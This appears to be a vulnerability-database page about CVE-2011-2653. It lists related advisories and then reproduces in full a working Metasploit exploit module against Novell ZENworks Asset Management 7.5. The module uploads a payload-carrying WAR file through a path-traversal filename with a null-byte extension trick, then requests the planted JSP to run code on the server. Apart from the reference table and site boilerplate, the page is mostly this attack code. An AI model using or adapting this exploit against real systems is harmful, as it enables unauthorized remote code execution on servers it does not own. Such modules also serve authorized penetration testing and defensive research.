| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Novell ZENworks Asset Management Remote Execution | 14 Aug 201200:00 | – | zdt | |
| CVE-2011-2653 | 15 Aug 201200:00 | – | circl | |
| Novell ZENworks Asset Management Directory Traversal (CVE-2011-2653) | 6 Jun 201300:00 | – | checkpoint_advisories | |
| CVE-2011-2653 | 8 Dec 201111:00 | – | cve | |
| CVE-2011-2653 | 8 Dec 201111:00 | – | cvelist | |
| DSquare Exploit Pack: D2SEC_ZAM | 8 Dec 201111:55 | – | d2 | |
| Novell ZENWorks Asset Management 7.5 File Upload | 30 Apr 201200:00 | – | dsquare | |
| Novell ZENworks Asset Management - Remote Execution (Metasploit) | 15 Aug 201200:00 | – | exploitdb | |
| CVE-2011-2653 | 8 Dec 201111:55 | – | nvd | |
| Novell ZENworks Asset Management Remote Execution | 14 Aug 201200:00 | – | packetstorm |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management Remote Execution',
'Description' => %q{
This module exploits a path traversal flaw in Novell ZENworks Asset Management
7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file
outside of the MalibuUploadDirectory and then make a secondary request that allows
for arbitrary code execution.
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-2653' ],
[ 'OSVDB', '77583' ],
[ 'BID', '50966' ],
[ 'ZDI', '11-342' ],
[ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]
],
'Privileged' => true,
'Platform' => [ 'java' ],
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2011-11-02'))
register_options(
[
Opt::RPORT(8080),
OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])
])
end
def exploit
# Generate the WAR containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8))
war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s
uid = rand_text_alphanumeric(34).to_s
data = "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"RequestParms\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"rtyp\"\r\n\r\n"
data << "prod\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"sess\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"mode\"\r\n\r\n"
data << "newreport\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"dp\"\r\n\r\n"
data << "n\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"oldentry\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"act\"\r\n\r\n"
data << "malibu.StartImportPAC\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"saveact\"\r\n\r\n"
data << "malibu.StartImportPAC\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"isalert\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"language\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"queryid\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"Locale\"\r\n\r\n"
data << "MM/dd/yyyy\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"CurrencySym\"\r\n\r\n"
data << "$\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"CurrencyPos\"\r\n\r\n"
data << "start\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"ThousandsSep\"\r\n\r\n"
data << ",\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"CurDecimalPt\"\r\n\r\n"
data << ".\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"MinusSign\"\r\n\r\n"
data << "-\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"sum\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"grp\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"col\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"PreLoadRight\"\r\n\r\n"
data << "yes\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"console\"\r\n\r\n"
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"uploadFile\"; filename=\"/#{"../" * datastore['DEPTH']}#{app_base}.war\x00.txt\"\r\n"
data << "Content-Type: application/octet-stream\r\n\r\n"
data << war_data
data << "\r\n"
data << "------#{uid}\r\n"
data << "Content-Disposition: form-data; name=\"SuccessPage\"\r\n\r\n"
data << "Html/UploadSuccess.html\r\n"
data << "------#{uid}--\r\n"
res = send_request_cgi(
{
'uri' => "/rtrlet/catch",
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=----#{uid}",
'data' => data,
})
print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...")
select(nil, nil, nil, 10)
if (res.code == 500)
print_status("Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...")
send_request_raw(
{
'uri' => "/#{app_base}/" + "#{jsp_name}" + '.jsp',
'method' => 'GET',
})
else
print_error("WAR upload failed...")
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation